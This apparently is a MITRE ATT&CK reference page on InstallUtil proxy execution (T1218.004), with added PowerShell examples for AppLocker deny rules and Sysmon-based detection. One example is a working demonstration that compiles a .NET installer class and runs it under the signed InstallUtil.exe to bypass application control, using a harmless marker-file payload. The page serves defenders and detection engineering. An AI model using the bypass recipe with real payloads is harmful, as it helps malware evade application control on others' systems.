Description
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that installs and uninstalls resources by executing the installer components contained in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary is digitally signed by Microsoft and is located in the .NET Framework directories on a Windows system: `C:\Windows\Microsoft.NET\Framework\v<version>` and `C:\Windows\Microsoft.NET\Framework64\v<version>`.
InstallUtil may also be used to bypass application control: it loads the supplied .NET binary and executes the installer class decorated with the attribute [System.ComponentModel.RunInstaller(true)], so any code placed in that class runs under the signed utility rather than as a separately launched executable. (Citation: LOLBAS Installutil)
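The mechanism described above, as an added example written for this page (it is not code from the ATT&CK entry or from the cited LOLBAS listing): a minimal .NET assembly whose Installer subclass carries [RunInstaller(true)] is compiled to disk and then handed to InstallUtil.exe with the uninstall switch. InstallUtil locates that class and calls its Uninstall() method, so the method body executes inside the Microsoft-signed installutil.exe process. The payload here only writes a marker file. Assumptions: Windows PowerShell 5.1 on .NET Framework 4.x; the C:\Temp paths, the demo.dll name and the DemoInstaller class name are arbitrary.

```powershell
# Added example, not code from the ATT&CK page or the cited LOLBAS entry. It shows the
# mechanism: InstallUtil.exe loads the assembly, finds the System.Configuration.Install.Installer
# subclass tagged [RunInstaller(true)], and calls Install() or, with /U, Uninstall(). Whatever
# those methods contain runs under a Microsoft-signed installutil.exe process.
# Assumptions: Windows PowerShell 5.1 on .NET Framework 4.x; C:\Temp, demo.dll and the
# class name are arbitrary; the payload only writes a marker file.

$source = @'
using System;
using System.IO;
using System.Collections;
using System.ComponentModel;
using System.Configuration.Install;

[RunInstaller(true)]
public class DemoInstaller : Installer
{
    // Reached via: InstallUtil.exe /logfile= /LogToConsole=false /U demo.dll
    // /U selects the uninstall path, so no InstallState file from a prior install is needed.
    public override void Uninstall(IDictionary savedState)
    {
        string host = System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName;
        File.WriteAllText(@"C:\Temp\installutil-demo.txt", "executed inside " + host);
    }
}
'@

New-Item -ItemType Directory -Path 'C:\Temp' -Force | Out-Null
$dll = 'C:\Temp\demo.dll'

# Compile the class into a DLL on disk, referencing the assembly that defines
# Installer and RunInstallerAttribute (System.Configuration.Install.dll).
Add-Type -AssemblyName System.Configuration.Install
$installRef = [System.Configuration.Install.Installer].Assembly.Location
Add-Type -TypeDefinition $source -ReferencedAssemblies $installRef `
         -OutputAssembly $dll -OutputType Library

# Use the InstallUtil.exe that ships with the runtime Windows PowerShell is running on
# (C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ on 64-bit Windows PowerShell).
$installUtil = Join-Path ([Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory()) 'InstallUtil.exe'

# Empty /logfile= and /LogToConsole=false suppress the installer log; /U runs Uninstall().
& $installUtil /logfile= /LogToConsole=false /U $dll

# The marker file should name installutil.exe as the process that wrote it.
Get-Content 'C:\Temp\installutil-demo.txt'
```

Two points worth noting from the run: the process that wrote the marker is installutil.exe, not powershell.exe, which is why hash- or publisher-based allow rules that trust the signed utility also trust whatever it is asked to uninstall; and demo.dll itself never has to be executable or signed, since InstallUtil loads it as a managed assembly.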
Platforms
Windows
Mitigations (2)
Execution Prevention (M1038)
Use application control configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.
Disable or Remove Feature or Program (M1042)
InstallUtil may not be necessary within a given environment. Where no deployment tooling relies on it, remove or restrict access to InstallUtil.exe in each .NET Framework directory rather than leaving a signed proxy-execution binary available to every user.
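One way to implement the Execution Prevention mitigation above, as an added example that is not part of the ATT&CK page: an AppLocker deny rule for InstallUtil.exe in both .NET Framework directories, checked with Test-AppLockerPolicy before it is applied. Assumptions: Windows PowerShell 5.1 on a host where AppLocker (the Application Identity service) is available and the Exe rule collection is enforced; the rule GUIDs and names are arbitrary, and the `*` wildcard for the version folder is the form I expect AppLocker to accept, which the dry run verifies.

```powershell
# Added example (not from the ATT&CK page): AppLocker deny rules for InstallUtil.exe,
# tested with Test-AppLockerPolicy before being merged into the local policy.
# Assumptions: Windows PowerShell 5.1, AppLocker available, Exe collection enforced.
# Rule GUIDs and names are arbitrary. S-1-1-0 is the Everyone SID; replace it with the
# SID of a deployment group if that group legitimately needs InstallUtil.

$rulesXml = @'
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="c0f6d0a2-0c7e-4b41-9f8b-1a2b3c4d5e6f"
                  Name="Deny InstallUtil.exe (32-bit Framework, T1218.004)"
                  Description="Block .NET Framework InstallUtil unless explicitly required"
                  UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions>
        <FilePathCondition Path="%WINDIR%\Microsoft.NET\Framework\*\InstallUtil.exe" />
      </Conditions>
    </FilePathRule>
    <FilePathRule Id="d1a7e1b3-1d8f-4c52-8a9c-2b3c4d5e6f70"
                  Name="Deny InstallUtil.exe (64-bit Framework, T1218.004)"
                  Description="Block .NET Framework InstallUtil unless explicitly required"
                  UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions>
        <FilePathCondition Path="%WINDIR%\Microsoft.NET\Framework64\*\InstallUtil.exe" />
      </Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
'@

$xmlPath = Join-Path $env:TEMP 'deny-installutil.xml'
Set-Content -Path $xmlPath -Value $rulesXml -Encoding UTF8

# Dry run: enumerate every InstallUtil.exe under the Framework directories and ask
# AppLocker what the new policy would decide for each one. Expect Denied for all.
$targets = Get-ChildItem "$env:WINDIR\Microsoft.NET\Framework*\v*\InstallUtil.exe" -ErrorAction SilentlyContinue
Test-AppLockerPolicy -XmlPolicy $xmlPath -Path $targets.FullName -User Everyone |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize

# Apply once the dry run looks right. -Merge keeps the existing rules in place.
# Set-AppLockerPolicy -XmlPolicy $xmlPath -Merge
```

Deny rules in AppLocker take precedence over allow rules, so this works even if a broad publisher rule already trusts Microsoft-signed binaries. It does not cover a copy of InstallUtil.exe moved elsewhere, which is the reason the path-based deny should sit inside a default-deny Exe collection rather than stand alone, and why the detection guidance further down still matters.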
Threat Groups (2)
| ID | Group | Context |
|---|---|---|
| G0129 | Mustang Panda | [Mustang Panda](https://attack.mitre.org/groups/G0129) has used `InstallUtil.exe` to execute a malicious Beacon stager.(Citation: Anomali M... |
| G0045 | menuPass | [menuPass](https://attack.mitre.org/groups/G0045) has used `InstallUtil.exe` to execute malicious software.(Citation: PWC Cloud Hopper Tech... |
Associated Software (4)
| ID | Name | Type | Context |
|---|---|---|---|
| S0631 | Chaes | Malware | [Chaes](https://attack.mitre.org/software/S0631) has used `InstallUtil.exe` to download content.(Citation: Cybereason Chaes Nov 2020) |
| S0689 | WhisperGate | Malware | [WhisperGate](https://attack.mitre.org/software/S0689) has used `InstallUtil.exe` as part of its process to disable Windows Defender.(Citation: Unit 4... |
| S1155 | Covenant | Tool | [Covenant](https://attack.mitre.org/software/S1155) can create launchers via an InstallUtil XML file to install new Grunt listeners.(Citation: Github ... |
| S1018 | Saint Bot | Malware | [Saint Bot](https://attack.mitre.org/software/S1018) has used `InstallUtil.exe` to download and deploy executables.(Citation: Malwarebytes Saint Bot A... |
References
- LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.
Frequently Asked Questions
What is T1218.004 (InstallUtil)?
T1218.004 is a MITRE ATT&CK sub-technique named 'InstallUtil', under System Binary Proxy Execution (T1218). It belongs to the Defense Evasion tactic. Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by exec...
How can T1218.004 be detected?
Detection of T1218.004 (InstallUtil) centres on process-creation telemetry. Monitor the execution and command-line arguments of InstallUtil.exe (for example Sysmon Event ID 1, or Windows Security event 4688 with command-line auditing enabled) and compare recent invocations against the prior history of known-good arguments and executed binaries to find anomalous, potentially adversarial activity. Indicators worth alerting on include the uninstall switch combined with a suppressed log (`/logfile= /LogToConsole=false /U`), target assemblies loaded from user-writable paths such as Temp or AppData, a copy of InstallUtil.exe running from outside the .NET Framework directories, and unusual parent processes such as Office applications or script hosts. Command arguments used before and after the InstallUtil.exe invocation may also help determine the origin and purpose of the binary being executed.
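The comparison against known-good invocations described above, scripted as an added example (not part of the ATT&CK page): a function that takes process-creation records with Image, CommandLine and ParentImage fields, which is the shape Sysmon Event ID 1 provides, and returns a reason list for each InstallUtil.exe invocation that looks anomalous. The three sample events are constructed for the example, not real telemetry; the known-good path, the user-writable directory list and the suspicious-parent list are assumptions to be replaced with your own baseline.

```powershell
# Added example (not from the ATT&CK page): flag anomalous InstallUtil.exe process creations.
# Input objects need Image, CommandLine and ParentImage, as in Sysmon Event ID 1. The sample
# events below are constructed so the logic runs offline. Paths, parent list and the
# known-good baseline are assumptions.

function Test-InstallUtilAnomaly {
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [pscustomobject] $Event,
        # Assemblies your deployment tooling legitimately installs; everything else is reported.
        [string[]] $KnownGoodAssemblies = @()
    )
    process {
        $image  = $Event.Image
        $cmd    = $Event.CommandLine
        $parent = $Event.ParentImage
        if ($image -notmatch '\\installutil\.exe$') { return }   # -match is case-insensitive

        $reasons = @()

        # 1. Binary outside the .NET Framework directories: a copied or renamed InstallUtil.
        if ($image -notmatch '^[A-Z]:\\Windows\\Microsoft\.NET\\Framework(64)?\\v[\d.]+\\InstallUtil\.exe$') {
            $reasons += 'installutil.exe running from outside the .NET Framework directory'
        }

        # 2. The LOLBAS pattern: uninstall switch with the installer log suppressed.
        if ($cmd -match '(^|\s)/u(\s|$)' -and $cmd -match '/logfile=(\s|$)') {
            $reasons += '/U with empty /logfile= (uninstall path, log suppressed)'
        }

        # 3. Target assembly sitting in a user-writable location.
        if ($cmd -match '\\(Temp|AppData|Downloads|Users\\Public|ProgramData)\\') {
            $reasons += 'target assembly in a user-writable directory'
        }

        # 4. Parent is an Office application or script host rather than an installer.
        if ($parent -match '\\(winword|excel|powerpnt|outlook|wscript|cscript|mshta|rundll32)\.exe$') {
            $reasons += "spawned by $([IO.Path]::GetFileName($parent))"
        }

        # 5. Anything not in the known-good baseline (ATT&CK's own guidance). The last
        #    quoted or bare .dll/.exe token on the command line is the assembly InstallUtil loads.
        $tokens = [regex]::Matches($cmd, '("[^"]+\.(?:dll|exe)"|\S+\.(?:dll|exe))')
        if ($tokens.Count -gt 0) {
            $target = $tokens[$tokens.Count - 1].Value.Trim('"')
            if ($KnownGoodAssemblies -notcontains $target) {
                $reasons += "assembly not in known-good baseline: $target"
            }
        }

        if ($reasons) {
            [pscustomobject]@{ Image = $image; CommandLine = $cmd; Reasons = ($reasons -join '; ') }
        }
    }
}

# Constructed sample events in Sysmon EID 1 shape. Not real telemetry.
$sample = @(
    [pscustomobject]@{
        Image       = 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe'
        CommandLine = 'InstallUtil.exe "C:\Program Files\Contoso\Agent\ContosoService.exe"'
        ParentImage = 'C:\Windows\System32\msiexec.exe' },
    [pscustomobject]@{
        Image       = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
        CommandLine = 'InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\alice\AppData\Local\Temp\update.dll'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE' },
    [pscustomobject]@{
        Image       = 'C:\Users\Public\svchost\InstallUtil.exe'
        CommandLine = 'InstallUtil.exe /u C:\Users\Public\svchost\a.dll'
        ParentImage = 'C:\Windows\System32\cmd.exe' }
)

# The first event is the legitimate baseline and produces no output; the other two are reported.
$sample | Test-InstallUtilAnomaly -KnownGoodAssemblies 'C:\Program Files\Contoso\Agent\ContosoService.exe' |
    Format-List

# Against live Sysmon data, replace $sample with the real events:
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
#   ForEach-Object {
#     $d = ([xml]$_.ToXml()).Event.EventData.Data
#     [pscustomobject]@{
#       Image       = ($d | Where-Object Name -eq 'Image').'#text'
#       CommandLine = ($d | Where-Object Name -eq 'CommandLine').'#text'
#       ParentImage = ($d | Where-Object Name -eq 'ParentImage').'#text' }
#   } | Test-InstallUtilAnomaly -KnownGoodAssemblies $myBaseline
```

Check 1 is what catches a copied InstallUtil.exe that a path-based application-control rule would miss, and check 5 is the one that needs tuning: start by recording every assembly InstallUtil has loaded on a clean host over a few weeks and seed the baseline from that, so the remaining reports are genuinely new invocations rather than routine service installs.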
What mitigations exist for T1218.004?
There are 2 documented mitigations for T1218.004. Key mitigations include: Execution Prevention, Disable or Remove Feature or Program.
Which threat groups use T1218.004?
Known threat groups using T1218.004 include: Mustang Panda, menuPass.